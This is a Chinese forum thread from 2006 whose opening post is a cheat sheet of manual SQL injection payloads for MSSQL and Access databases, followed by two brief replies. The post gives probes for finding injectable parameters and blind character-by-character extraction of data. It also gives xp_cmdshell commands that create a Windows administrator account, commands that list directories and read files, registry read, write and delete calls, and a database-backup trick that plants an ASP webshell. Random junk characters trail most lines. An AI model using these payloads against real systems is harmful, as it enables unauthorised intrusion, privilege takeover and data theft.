社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4579阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 ZmaGp* Wj  
  2.初步判断是否是mssql ;and user>0 F0KNkL>&g  
so_^%) gdJ  
  3.注入参数是字符'and [查询条件] and ''=' Cig! 3  
S9{&.[O  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' 2[I[I*"_d  
ZsN3 MbY  
  5.判断数据库系统 M5c *vs  
 U92?e}=]  
  ;and (select count(*) from sysobjects)>0 mssql sNsH l  
$D;-;5[-/r  
  ;and (select count(*) from msysobjects)>0 access :wz]d ~)  
I<!,_$:  
%ZT I ?a  
Lm7fz9F%  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 ~}g) N  
?P"j5  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 e$N1m:1*  
I>:.fHvUC  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ,~>u<Wc!S  
Bxk2P<d  
  9.(1)猜字段的ascii值(access) ofuQ`g1hb  
UQO?hZ!y/.  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 +?^lnoX  
6. 6x$y3v  
  (2)猜字段的ascii值(mssql) CO{AC~  
V`xE&BI  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 +m4?a\U  
x }i'2   
  10.测试权限结构(mssql) 7'RU\0QG  
(|sqN8SbA  
/vAA]n8  
&Vbcwv@  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- &24>9  
xbs X-F  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 7l3Dx w/N  
D)bR-a_^  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ZU.f)94u  
Idr|-s%l6'  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Qk8YR5 K   
8_{XrTw(  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- {jo"@&2S  
H iEQs|""'  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ni-4 ~k  
ew1bb K>  
  ;and 1=(select IS_MEMBER('db_owner'));-- &?M'(` ~  
=' &TqiIv"  
$O,IXA  
7%yP5c B  
  11.添加mssql和系统的帐户 QA#Jx  
W{nDmG`yp  
  ;exec master.dbo.sp_addlogin username;-- YLid2aF  
  ;exec master.dbo.sp_password null,username,password;-- -9yWf8;  
PY[!H<tt  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Vc&xXtm[v  
D`NQEt"(  
  ;exec master.dbo.xp_cmdshell 'net user username password dwz {Yw(  
M 9/J!s  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- YiC_,8A~  
a3^({;k!0  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- .1h1J  
M3YC@(N% k  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 8g6G},Y0  
 &W? hCr  
J" U!j  
o_?A^u  
  12.(1)遍历目录 -bp7X{&  
6mC% zXR5  
  ;create table dirs(paths varchar(100), id int) 0]2@T=*kTY  
*7K)J8kq  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' 1VB{dgr  
0ae}!LO  
  ;and (select top 1 paths from dirs)>0 e`;U9Z  
kx07Ium  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Mf`@X[-;  
-_fh=}.n+"  
g BV66L  
=QW:},sp  
  (2)遍历目录  S/Gy:GIf  
Pql;5 ~/  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- RaAvPIJa |  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 U&L?IT=x  
UE K$  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 v v]rXJu1  
D]hwG0Chd  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ItwJL`  
5j#XNc)"  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 dPyZzMes=  
G$CI~0Se:  
7hl,dtn7  
' O d_:]  
  13.mssql中的存储过程 we2D!Ywr  
9pq-"?vHY0  
  xp_regenumvalues 注册表根键, 子键 SAN/ fnM  
 ui1h M  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 fC!+"g55  
R2dCp|6A  
  xp_regread 根键,子键,键值名 -+&sPrQ  
|v= */e  
  ;exec xp_regread YE1X*'4  
[+>cW0a  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 <jtu/U]78|  
3L-}B#tI  
  xp_regwrite 根键,子键, 值名, 值类型, 值 P{o/ /M  
I] 0 D*z  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Ugv"A;l  
IGcYPL\&  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Un{9reX5  
@M8vP H  
  xp_regdeletevalue 根键,子键,值名 yn KgNi  
9vJ'9Z2\  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ]B9Ut&mF;  
U$AV"F&!&}  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 "78BApjWT6  
'{:lP"\,L  
xQ@gh ( (  
d(;Qe}ok>  
  14.mssql的backup创建webshell DT>Giic  
m7NrS?7  
  use model p^?]xD(  
jt4c*0z  
  create table cmd(str image); uI+^8-HZ;  
IjnO2X  
  insert into cmd(str) values (''); (xlA S  
F!~oJ  
  backup database model to disk='c:\l.asp'; QOKE9R#Y  
GB` G(a  
av4g/7=  
yZqX[U  
  15.mssql内置函数 |-.r9;-b  
`T~~yM)q  
  ;and (select @@version)>0 获得Windows的版本号 rd!4u14  
/\|Behif  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa l|'{Cb   
1g bqHxWI  
  ;and (select user_name())>0 爆当前系统的连接用户 0v'FE35~s  
|(O _K(  
  ;and (select db_name())>0 得到当前连接的数据库 ul[+vpH9  
GJbU1k]  
0ZjinWkR[  
9{XC9 \~  
  16.简洁的webshell pTIE.:g(  
q5u"v  
  use model ahqsbNu1  
@#KZ2^  
  create table cmd(str image); %Astfn(U{4  
~91) DNaE  
  insert into cmd(str) values (''); XonI   
V~_aM@q1  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八